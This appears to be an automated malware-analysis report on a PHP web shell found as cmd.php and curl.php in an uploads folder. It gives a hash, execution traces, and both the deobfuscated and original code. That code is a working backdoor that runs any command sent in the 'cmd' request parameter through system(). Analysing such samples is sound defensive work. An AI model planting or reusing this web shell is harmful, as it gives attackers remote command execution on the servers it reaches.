PHP Malware Analysis

cmd.php, curl.php

md5: 4ca89cefa4d0a69dad7df756b7045f22

Attributes

Execution


Deobfuscated PHP code

<?php

if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}

Execution traces

data/traces/4ca89cefa4d0a69dad7df756b7045f22_trace-1676246490.0534.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:01:55.951265]
1	0	1	0.000143	393512
1	3	0	0.000193	394592	{main}	1		/var/www/html/uploads/curl.php	0	0
1	3	1	0.000210	394592
			0.000234	314224
TRACE END   [2023-02-12 22:01:55.951385]

data/traces/4ca89cefa4d0a69dad7df756b7045f22_trace-1676257644.4797.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:07:50.377472]
1	0	1	0.000140	393512
1	3	0	0.000193	394592	{main}	1		/var/www/html/uploads/cmd.php	0	0
1	3	1	0.000211	394592
			0.000235	314224
TRACE END   [2023-02-13 01:07:50.377597]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>